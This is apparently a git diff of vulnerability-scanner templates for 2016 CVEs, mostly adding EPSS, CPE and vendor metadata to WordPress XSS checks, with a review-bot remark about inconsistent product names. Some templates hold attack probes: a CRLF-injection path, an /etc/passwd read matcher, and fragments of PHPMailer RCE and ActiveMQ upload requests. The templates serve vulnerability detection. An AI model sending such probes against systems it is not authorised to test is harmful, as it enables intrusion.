https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000131 cwe-id: CWE-79 + epss-score: 0.001 + cpe: cpe:2.3:a:e-search_project:esearch:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/e-search" + framework: wordpress + vendor: e-search_project + product: esearch tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -28,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml index 6e4067633f..6c01ed11c2 100644 --- a/http/cves/2016/CVE-2016-1000132.yaml +++ b/http/cves/2016/CVE-2016-1000132.yaml 
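Review bot: `cpe: cpe:2.3:a:e-search_project:esearch:1.0:*:*:*:*:wordpress:*:*` and `product: esearch` in the CVE-2016-1000131 hunk disagree with the CVE-2016-1000130 section just above, which uses `e-search` for what both templates treat as the same plugin (each keeps `google-query: inurl:"/wp-content/plugins/e-search"`). Unless NVD really records two product spellings for this plugin, align the two so that filtering on `product` groups them; the remainder of the hunk matches the pattern used for the other WordPress templates in this commit.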
@@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=37 - https://wordpress.org/plugins/enhanced-tooltipglossary - - http://web.archive.org/web/20210123183532/https://www.securityfocus.com/bid/93865/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000132 cwe-id: CWE-79 + epss-score: 0.00116 + cpe: cpe:2.3:a:cminds:tooltip_glossary:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary" + framework: wordpress + vendor: cminds + product: tooltip_glossary tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -28,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml index 38926e240e..2839c0fccf 100644 --- a/http/cves/2016/CVE-2016-1000133.yaml +++ b/http/cves/2016/CVE-2016-1000133.yaml @@ -8,16 +8,20 @@ info: reference: - https://wordpress.org/plugins/forget-about-shortcode-buttons - http://www.vapidlabs.com/wp/wp_advisory.php?v=602 - - http://web.archive.org/web/20210123183542/https://www.securityfocus.com/bid/93869/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000133 cwe-id: CWE-79 + epss-score: 0.00142 + cpe: cpe:2.3:a:designsandcode:forget_about_shortcode_buttons:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/forget-about-shortcode-buttons" + framework: wordpress + vendor: designsandcode + product: forget_about_shortcode_buttons tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -28,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header 
diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml index 2ab63fcf20..023b296800 100644 --- a/http/cves/2016/CVE-2016-1000134.yaml +++ b/http/cves/2016/CVE-2016-1000134.yaml @@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=530 - https://wordpress.org/plugins/hdw-tube - - http://web.archive.org/web/20210615135341/https://www.securityfocus.com/bid/93868 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000134 cwe-id: CWE-79 + epss-score: 0.001 + cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/hdw-tube" + framework: wordpress + vendor: hdw-tube_project + product: hdw-tube tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -28,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml index 7977a0cd7e..7bf2dc6517 100644 --- a/http/cves/2016/CVE-2016-1000135.yaml +++ b/http/cves/2016/CVE-2016-1000135.yaml @@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=533 - https://wordpress.org/plugins/hdw-tube - - http://web.archive.org/web/20210123183240/https://www.securityfocus.com/bid/93820/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000135 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000135 cwe-id: CWE-79 + epss-score: 0.001 + cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/hdw-tube" + framework: wordpress + vendor: hdw-tube_project + product: hdw-tube tags: cve,cve2016,wordpress,xss,wp-plugin http: 
@@ -28,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000136.yaml b/http/cves/2016/CVE-2016-1000136.yaml index 6d5e194125..ddf170e830 100644 --- a/http/cves/2016/CVE-2016-1000136.yaml +++ b/http/cves/2016/CVE-2016-1000136.yaml @@ -14,9 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000136 cwe-id: CWE-79 + epss-score: 0.00119 + cpe: cpe:2.3:a:heat-trackr_project:heat-trackr:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/heat-trackr" + framework: wordpress + vendor: heat-trackr_project + product: heat-trackr tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -27,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml index 6418e4da04..f8ed55f4d4 100644 --- a/http/cves/2016/CVE-2016-1000137.yaml +++ b/http/cves/2016/CVE-2016-1000137.yaml @@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=658 - https://wordpress.org/plugins/hero-maps-pro - - http://web.archive.org/web/20210123183224/https://www.securityfocus.com/bid/93815/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000137 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000137 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin,maps + epss-score: 0.001 + cpe: cpe:2.3:a:hero-maps-pro_project:hero-maps-pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: hero-maps-pro_project + product: hero-maps-pro + tags: cve,cve2016,wordpress,xss,wp-plugin,maps http: - method: GET @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header 
diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml index 6ca1ef4786..d63886fd31 100644 --- a/http/cves/2016/CVE-2016-1000138.yaml +++ b/http/cves/2016/CVE-2016-1000138.yaml @@ -15,9 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000138 cwe-id: CWE-79 + epss-score: 0.00119 + cpe: cpe:2.3:a:indexisto_project:indexisto:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/indexisto" + framework: wordpress + vendor: indexisto_project + product: indexisto tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -28,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml index b475e5195c..5c9a04c0ac 100644 --- a/http/cves/2016/CVE-2016-1000139.yaml +++ b/http/cves/2016/CVE-2016-1000139.yaml @@ -15,9 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000139 cwe-id: CWE-79 + epss-score: 0.00116 + cpe: cpe:2.3:a:infusionsoft_project:infusionsoft:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/infusionsoft" + framework: wordpress + vendor: infusionsoft_project + product: infusionsoft tags: cve,cve2016,wordpress,wp-plugin,xss,wpscan http: @@ -28,11 +33,11 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '"><"' - 'input type="text" name="ContactId"' condition: and - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml index dcef099c48..f9b9ddbb8c 100644 --- a/http/cves/2016/CVE-2016-1000140.yaml +++ b/http/cves/2016/CVE-2016-1000140.yaml 
@@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=453 - https://wordpress.org/plugins/new-year-firework - - http://web.archive.org/web/20210123183230/https://www.securityfocus.com/bid/93817/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000140 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000140 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + epss-score: 0.00119 + cpe: cpe:2.3:a:new-year-firework_project:new-year-firework:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: new-year-firework_project + product: new-year-firework + tags: cve,cve2016,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index 08d8445568..dcd7398dd7 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -15,9 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000141 cwe-id: CWE-79 + epss-score: 0.00142 + cpe: cpe:2.3:a:page-layout-builder_project:page-layout-builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/page-layout-builder" + framework: wordpress + vendor: page-layout-builder_project + product: page-layout-builder tags: cve,cve2016,wordpress,xss,wp-plugin http: @@ -28,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index 278c585382..fce3b936c2 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml 
@@ -15,9 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000142 cwe-id: CWE-79 - tags: cve2016,wordpress,wp-plugin,xss,wpscan,cve + epss-score: 0.00103 + cpe: cpe:2.3:a:parsi-font_project:parsi-font:4.2.5:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: parsi-font_project + product: parsi-font + tags: cve2016,wordpress,wp-plugin,xss,wpscan,cve http: - method: GET @@ -27,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml index 0ea9c628b3..cb2e360636 100644 --- a/http/cves/2016/CVE-2016-1000143.yaml +++ b/http/cves/2016/CVE-2016-1000143.yaml @@ -14,9 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000143 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,wp-plugin,xss + epss-score: 0.00142 + cpe: cpe:2.3:a:photoxhibit_project:photoxhibit:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: photoxhibit_project + product: photoxhibit + tags: cve,cve2016,wordpress,wp-plugin,xss http: - method: GET @@ -26,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index 04c9f1328c..b7d716f5b8 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml 
@@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=787 - https://wordpress.org/plugins/pondol-formmail - - http://web.archive.org/web/20210615122859/https://www.securityfocus.com/bid/93584 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000146 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000146 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin,mail + epss-score: 0.00119 + cpe: cpe:2.3:a:pondol-formmail_project:pondol-formmail:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: pondol-formmail_project + product: pondol-formmail + tags: cve,cve2016,wordpress,xss,wp-plugin,mail http: - method: GET @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index fd8647776b..4ec082eb05 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -15,9 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2016-1000148 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,wp-plugin,xss,wpscan + epss-score: 0.00119 + cpe: cpe:2.3:a:s3-video_project:s3-video:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: s3-video_project + product: s3-video + tags: cve,cve2016,wordpress,wp-plugin,xss,wpscan http: - method: GET @@ -27,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '<"' - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index 9ea1b58aee..e4cd2c79db 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml 
@@ -8,16 +8,20 @@ info: reference: - https://wordpress.org/plugins/simpel-reserveren - http://www.vapidlabs.com/wp/wp_advisory.php?v=474 - - http://web.archive.org/web/20210125181834/https://www.securityfocus.com/bid/93582/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000149 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + epss-score: 0.00119 + cpe: cpe:2.3:a:simpel-reserveren_project:simpel-reserveren:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: simpel-reserveren_project + product: simpel-reserveren + tags: cve,cve2016,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml index 26b3aafbaf..75c9aeb247 100644 --- a/http/cves/2016/CVE-2016-1000152.yaml +++ b/http/cves/2016/CVE-2016-1000152.yaml @@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=799 - https://wordpress.org/plugins/tidio-form - - http://web.archive.org/web/20210125181732/https://www.securityfocus.com/bid/93579/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000152 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000152 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + epss-score: 0.00249 + cpe: cpe:2.3:a:tidio-form_project:tidio-form:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: tidio-form_project + product: tidio-form + tags: cve,cve2016,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header 
diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index 42b3505143..b9cb2155fb 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ b/http/cves/2016/CVE-2016-1000153.yaml @@ -9,15 +9,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2016-1000153 - http://www.vapidlabs.com/wp/wp_advisory.php?v=427 - https://wordpress.org/plugins/tidio-gallery - - http://web.archive.org/web/20210123180207/https://www.securityfocus.com/bid/93543/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000153 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + epss-score: 0.001 + cpe: cpe:2.3:a:tidio-gallery_project:tidio-gallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: tidio-gallery_project + product: tidio-gallery + tags: cve,cve2016,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index edf2e75fb5..69fc49e624 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -8,16 +8,20 @@ info: reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=112 - https://wordpress.org/plugins/whizz - - http://web.archive.org/web/20210123180140/https://www.securityfocus.com/bid/93538/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000154 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + epss-score: 0.00142 + cpe: cpe:2.3:a:browserweb:whizz:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: browserweb + product: whizz + tags: cve,cve2016,wordpress,xss,wp-plugin http: - method: GET 
@@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index 548fed602e..aa6e5de965 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -8,16 +8,20 @@ info: reference: - https://wordpress.org/plugins/wpsolr-search-engine - http://www.vapidlabs.com/wp/wp_advisory.php?v=303 - - http://web.archive.org/web/20210123180137/https://www.securityfocus.com/bid/93536/ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000155 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000155 cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin + epss-score: 0.00103 + cpe: cpe:2.3:a:wpsolr:wpsolr-search-engine:7.6:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: wpsolr + product: wpsolr-search-engine + tags: cve,cve2016,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index a676cc7122..af008b59ce 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml 
@@ -10,15 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2016-10033 - https://www.exploit-db.com/exploits/40970/ - https://www.exploit-db.com/exploits/40968/ + - http://seclists.org/fulldisclosure/2016/Dec/78 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-10033 cwe-id: CWE-77 - epss-score: 0.97459 - tags: cve,cve2016,rce,edb,wordpress + epss-score: 0.97464 + cpe: cpe:2.3:a:phpmailer_project:phpmailer:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: phpmailer_project + product: phpmailer + tags: seclists,cve,cve2016,rce,edb,wordpress http: - raw: @@ -36,22 +40,23 @@ http: wp-submit=Get+New+Password&redirect_to=&user_login={{username}} unsafe: true - extractors: - - type: regex - name: username - internal: true - group: 1 - part: body - regex: - - 'Author:(?:[A-Za-z0-9 -\_="]+)?' - part: body - type: word part: header diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index 794dba76ff..6d40e10c27 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -10,14 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2016-1555 - https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic - http://seclists.org/fulldisclosure/2016/Feb/112 + - http://packetstormsecurity.com/files/135956/D-Link-Netgear-FIRMADYNE-Command-Injection-Buffer-Overflow.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-1555 cwe-id: CWE-77 - tags: netgear,rce,oast,router,kev,seclists,cve,cve2016 + epss-score: 0.97385 + cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: netgear + product: wnap320_firmware + tags: seclists,packetstorm,netgear,rce,oast,router,kev,cve,cve2016 http: - raw: 
@@ -31,6 +36,6 @@ http: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index 180ddbc9ea..81a67bc3de 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -10,15 +10,20 @@ info: - http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html - https://www.exploit-db.com/exploits/39837/ - https://nvd.nist.gov/vuln/detail/CVE-2016-2389 + - http://seclists.org/fulldisclosure/2016/May/40 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-2389 cwe-id: CWE-22 + epss-score: 0.24589 + cpe: cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.favicon.hash:-266008933 - tags: lfi,sap,packetstorm,edb,cve,cve2016 + vendor: sap + product: netweaver + tags: packetstorm,seclists,lfi,sap,edb,cve,cve2016 http: - method: GET @@ -27,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml index eb99e6faee..8a6410c511 100644 --- a/http/cves/2016/CVE-2016-3081.yaml +++ b/http/cves/2016/CVE-2016-3081.yaml @@ -11,14 +11,19 @@ info: - https://struts.apache.org/docs/s2-032.html - https://nvd.nist.gov/vuln/detail/CVE-2016-3081 - http://web.archive.org/web/20211207042547/https://securitytracker.com/id/1035665 + - http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160527-01-struts2-en classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2016-3081 cwe-id: CWE-77 - tags: cve,cve2016,struts,rce,apache + epss-score: 0.97524 + cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: struts + tags: cve,cve2016,struts,rce,apache http: - raw: 
@@ -28,9 +33,10 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: regex regex: - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index 70a549181f..96664a0b13 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -10,15 +10,19 @@ info: - https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30 - http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt - https://nvd.nist.gov/vuln/detail/CVE-2016-3088 + - http://rhn.redhat.com/errata/RHSA-2016-2036.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-3088 cwe-id: CWE-20 - tags: fileupload,kev,edb,cve,cve2016,apache,activemq,intrusive + epss-score: 0.83955 + cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 2 - + vendor: apache + product: activemq + tags: fileupload,kev,edb,cve,cve2016,apache,activemq,intrusive variables: rand1: '{{rand_int(11111111, 99999999)}}' @@ -29,7 +33,6 @@ http: Host: {{Hostname}} {{rand1}} - - | GET /fileserver/{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index e514a51f79..afa4cbfe17 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml 
@@ -9,14 +9,19 @@ info: - http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2016-3978 - http://seclists.org/fulldisclosure/2016/Mar/68 + - http://www.securitytracker.com/id/1035332 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-3978 cwe-id: CWE-79 - tags: cve2016,redirect,fortinet,fortios,seclists,cve + epss-score: 0.00217 + cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: fortinet + product: fortios + tags: cve2016,redirect,fortinet,fortios,seclists,cve http: - method: GET diff --git a/http/cves/2016/CVE-2016-4437.yaml b/http/cves/2016/CVE-2016-4437.yaml index 56da989e55..23ff51f926 100644 --- a/http/cves/2016/CVE-2016-4437.yaml +++ b/http/cves/2016/CVE-2016-4437.yaml @@ -11,15 +11,18 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4437 - http://packetstormsecurity.com/files/137310/Apache-Shiro-1.2.4-Information-Disclosure.html - http://packetstormsecurity.com/files/157497/Apache-Shiro-1.2.4-Remote-Code-Execution.html + - http://rhn.redhat.com/errata/RHSA-2016-2035.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2016-4437 cwe-id: CWE-284 + epss-score: 0.97483 cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:* - epss-score: 0.9748 metadata: max-request: 1 + vendor: apache + product: shiro tags: cve,apache,rce,kev,packetstorm,cve2016,shiro,deserialization,oast http: diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index 585689c767..87c413a791 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml 
@@ -8,20 +8,28 @@ info: reference: - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975 - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975 + - https://lists.apache.org/thread.html/56c2e7cc9deb1c12a843d0dc251ea7fd3e7e80293cde02fcd65286ba@%3Ccvs.httpd.apache.org%3E + - https://lists.apache.org/thread.html/84a3714f0878781f6ed84473d1a503d2cc382277e100450209231830@%3Ccvs.httpd.apache.org%3E + - https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f@%3Ccvs.httpd.apache.org%3E remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-4975 cwe-id: CWE-93 - tags: cve,cve2016,crlf,generic,apache + epss-score: 0.00366 + cpe: cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: http_server + tags: cve,cve2016,crlf,generic,apache http: - method: GET path: - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" + matchers: - type: regex part: 